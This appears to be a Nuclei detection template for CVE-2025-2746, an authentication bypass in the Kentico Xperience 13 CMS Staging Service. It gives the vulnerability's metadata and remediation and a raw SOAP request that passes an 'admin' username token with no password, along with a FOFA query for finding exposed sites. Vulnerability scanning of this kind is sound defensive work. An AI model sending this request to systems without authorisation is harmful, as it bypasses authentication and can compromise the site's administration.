id: CVE-2025-2746

info:
  name: Kentico Xperience 13 CMS - Staging Service Authentication Bypass (WT-2025-0011)
  author: DhiyaneshDK
  severity: critical
  description: |
    Before Kentico Xperience 13 Hotfix 173, this vulnerability can be exploited with any username provided. For Hotfix >= 173 and < 178, this vulnerability can be exploited only if you provide a valid Staging Service username (default: admin)
  impact: |
    Unauthenticated attackers can bypass authentication in the Staging Service using any username (or valid username depending on hotfix version), potentially gaining control of administrative objects and compromising the entire CMS.
  remediation: |
    Upgrade to Kentico Xperience 13 Hotfix 178 or later that properly validates Staging Service authentication.
  reference:
    - https://github.com/watchtowrlabs/kentico-xperience13-AuthBypass-wt-2025-0011
    - https://devnet.kentico.com/download/hotfixes
    - https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-2746
    cwe-id: CWE-287
    epss-score: 0.89733
    epss-percentile: 0.99585
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="Kentico-CMS"
  tags: cve,cve2025,kentico,stag,auth-bypass,xperience13,vuln,kev,vkev

variables:
  rand: "{{to_lower(rand_text_alpha(32))}}"

http:
  - raw:
      - |
        POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: text/xml; charset=utf-8
        SOAPAction: http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData

        <?xml version="1.0" encoding="utf-8"?>
            <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
                <soap:Header>
                    <wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
                        <wsse:UsernameToken>
                            <wsse:Username>admin</wsse:Username>
                        </wsse:UsernameToken>
                    </wsse:Security>
                </soap:Header>
                <soap:Body>
                    <ProcessSynchronizationTaskData xmlns="http://localhost/SyncWebService/SyncServer">
                        <stagingTaskData><![CDATA[<{{rand}}>]]></stagingTaskData>
                    </ProcessSynchronizationTaskData>
                </soap:Body>
            </soap:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{rand}}"
          - "<wsa:Action>"
        condition: and

      - type: word
        part: body
        words:
          - "Site not running"
          - "SyncServer.ErrorLicense"
          - "SyncServer.ErrorServiceNotEnabled"
          - "Staging service is not enabled on this server"
          - "Staging does not work with blank password"
          - "Missing X509 certificate token"
          - "The security token could not be authenticated or authorized"
        condition: or
        negative: true

      - type: word
        part: content_type
        words:
          - "text/xml"
# digest: 4b0a00483046022100c62dd924c6187ff82239fecf4c3853fb56824515c79c315909a953606b5b46e10221009fdc90576d5f9a810c6054bbace3d2f91f74bacd69c722c8bf90e8b0ed72e1ee:922c64590222798bb761d5b6d8e72950